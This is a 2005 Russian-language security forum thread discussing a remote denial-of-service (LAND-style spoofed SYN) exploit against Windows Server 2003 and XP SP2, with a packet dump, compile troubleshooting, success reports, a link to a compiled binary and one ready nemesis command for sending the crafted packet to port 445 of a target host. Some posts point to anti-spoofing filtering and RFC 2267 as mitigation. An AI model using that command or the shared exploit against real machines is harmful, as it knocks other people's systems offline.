Windows Server 2003 and XP SP2 remote DoS

Гость Guest	#1 Это нравится:0 Да/0 Нет 07.03.2005 14:32:06 Обсуждение статьи Windows Server 2003 and XP SP2 remote DoS exploit

Welldone Guest	#2 Это нравится:0 Да/0 Нет 08.03.2005 14:32:39 Have anybody binary version for Windows?

kiwi Guest	#3 Это нравится:0 Да/0 Нет 08.03.2005 14:45:39 http://www.security.nnov.ru/files/newLand.zip Рабочий Скомпилить RST не удалось

Welldone Guest	#4 Это нравится:0 Да/0 Нет 08.03.2005 16:19:17 I tried the same and i used port 445 and 139 but nothing happend

Гость

Guest

Это нравится:0 Да/0 Нет

08.03.2005 17:29:41

Цитата
Welldone пишет: I tried the same and i used port 445 and 139 but nothing happend

Аналогично! протестил на W2k3 и XPSP2, и с других машин и через localhost на порты 139, 445 и ни какого результата. Машины спокойно глотали:
Ethernet II
     Destination MAC: FF:FF:FF:FF:FF:FF
     Source MAC: 02:02:02:02:02:02
     Ethertype: 0x0800 (2048) - IP
IP
     IP version: 0x04 (4)
     Header length: 0x05 (5) - 20 bytes
     Type of service: 0x00 (0)
           Precedence: 000 - Routine
           Delay: 0 - Normal delay
           Throughput: 0 - Normal throughput
           Reliability: 0 - Normal reliability
     Total length: 0x0028 (40)
     ID: 0xFBB8 (64440)
     Flags
           Dont fragment bit: 0 - May fragment
           More fragments bit: 0 - Last fragment
     Fragment offset: 0x0000 (0)
     Time to live: 0xFF (255)
     Protocol: 0x06 (6) - TCP
     Checksum: 0xC214 (49684) - correct
     Source IP: 127.0.0.1
     Destination IP: 127.0.0.1
     IP Options: None
TCP
     Source port: 139
     Destination port: 139
     Sequence: 0x00000000 (0)
     Acknowledgement: 0x00000000 (0)
     Header length: 0x05 (5) - 20 bytes
     Flags: SYN
           URG: 0
           ACK: 0
           PSH: 0
           RST: 0
           SYN: 1
           FIN: 0
     Window: 0x0126 (294)
     Checksum: 0xAFA4 (44964) - correct
     Urgent Pointer: 0x0000 (0)
     TCP Options: None
     Data length: 0x0 (0)

0x0000   FF FF FF FF FF FF 02 02-02 02 02 02 08 00 45 00   yyyyyy........E.
0x0010   00 28 FB B8 00 00 FF 06-C2 14 7F 00 00 01 7F 00   .(u?..y.A.....
0x0020   00 01 00 8B 00 8B 00 00-00 00 00 00 00 00 50 02   ...‹.‹........P.
0x0030   01 26 AF A4 00 00 00 00-00 00 00 00         &nbs p;     .&?¤........

Гость Guest	#6 Это нравится:0 Да/0 Нет 08.03.2005 18:17:49 > Tested under OpenBSD 3.6 at WinXP SP 2 это чо никсовый код?

iten

Guest

Это нравится:0 Да/0 Нет

08.03.2005 21:16:09

скомпилить под виндой весьма проблематично,
в Windows нет заголовков <sys/socket.h> и <netinet/in.h> и т.д, а есть <winsock2.h>, подключение которого влечот за собой много гемора...в Windows сокеты надо инициализировать

а при попытке заюзать откомпиленный с security.nnov получаю:
Generating packets... [Press CTRL-C to stop !]
.................................................
................. и время этой генерации упорно стремится к бесконечности. Подскожите что с ним сделать.

r00t

Guest

Это нравится:0 Да/0 Нет

08.03.2005 21:59:31

Номано работает. У Win2k3 Server GUI полностью зависает секунд на 10, потом отлипает, smbclient -L думает при листинге шар с задошенной винды секунды 3. DoS из инета осложнен применением анти-спуф фильтров на роутерах.

Гость Guest	#9 Это нравится:0 Да/0 Нет 08.03.2005 22:06:55 А что пропатчить никак нельзя от этой заразы?

__blf Guest	#10 Это нравится:0 Да/0 Нет 09.03.2005 00:14:15 Сплоит рабочий, собирать под *BSD, я писал под OpenBSD 3.6.

Гость

Guest

#11

Это нравится:0 Да/0 Нет

09.03.2005 03:27:54

Цитата
__blf пишет: Сплоит рабочий, собирать под *BSD, я писал под OpenBSD 3.6.

)) да, здорово![IMG]http://www.securitylab.ru/forum/smileys/smiley17.gif[/IMG] твой сплоит рабочий. Когда его запуск пустил по циклу, winь умерла))
А вот это http://www.security.nnov.ru/files/newLand.zip, ни фига не пашет((

iten Guest	#12 Это нравится:0 Да/0 Нет 09.03.2005 10:28:51 пакеты то генерируются а загрузки никакой!! на удалённой тачке WinXP sp2 (фаервол выключен) - на нагрузке цп атака никак не отражается!!

Makc_Sr

Guest

#13

Это нравится:0 Да/0 Нет

09.03.2005 10:54:06

под freeBSD 4.9/5.3 не собирается

In file included from r57windos.c:5:
/usr/include/netinet/in_systm.h:49: error: syntax error before "n_short"
/usr/include/netinet/in_systm.h:50: error: syntax error before "n_long"
/usr/include/netinet/in_systm.h:52: error: syntax error before "n_time"
...................................

citrin

Guest

#14

Это нравится:0 Да/0 Нет

09.03.2005 11:22:23

Mожно и без всякого эксплоита:

nemesis tcp -v -d xl0 -fS -x 445 -y 445 -D 192.168.xx.x -S 192.168.x.x -M xx:xx:xx:xx:xx:xx

Где 92.168.xx.x это ip атакуемого сервера,
xx:xx:xx:xx:xx:xx его мак, или мак роутера (но правильно настроеные роутеры фильтруют такие покаеты правилами для антиспуффинга).

citrin

Guest

#15

Это нравится:0 Да/0 Нет

09.03.2005 11:23:46

Цитата
Гость пишет: А что пропатчить никак нельзя от этой заразы?

Пока нет, но любым нормальным файрволом фильтровать такие пакеты несложно.

nmalykh Guest	#16 Это нравится:0 Да/0 Нет 09.03.2005 13:03:40 Рекомендации по защите от таких атак были опубликованы более 7 лет назад в RFC 2267 (см. оригинал или перевод на русский язык). Видимо автор эксплойта просто не читал этого документа.

Гость Guest	#17 Это нравится:0 Да/0 Нет 09.03.2005 16:05:11 Вчера поставил SP2, сегодня вылез в инет и через минуту уже повесили тачку, круто.

feel Guest	#18 Это нравится:0 Да/0 Нет 09.03.2005 16:36:33 у кого-нибудь есть ссылка на откомпелированный вариант? thnx заранее

feel Guest	#19 Это нравится:0 Да/0 Нет 09.03.2005 16:37:14 под win

Damian Guest	#20 Это нравится:0 Да/0 Нет 09.03.2005 16:44:07 как его под Linux собрать нормально? заголовочные поля tcp заголовка переписал, эксплоит скомпилился, но при запуске пишет setsockopt: Bad file descriptor

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?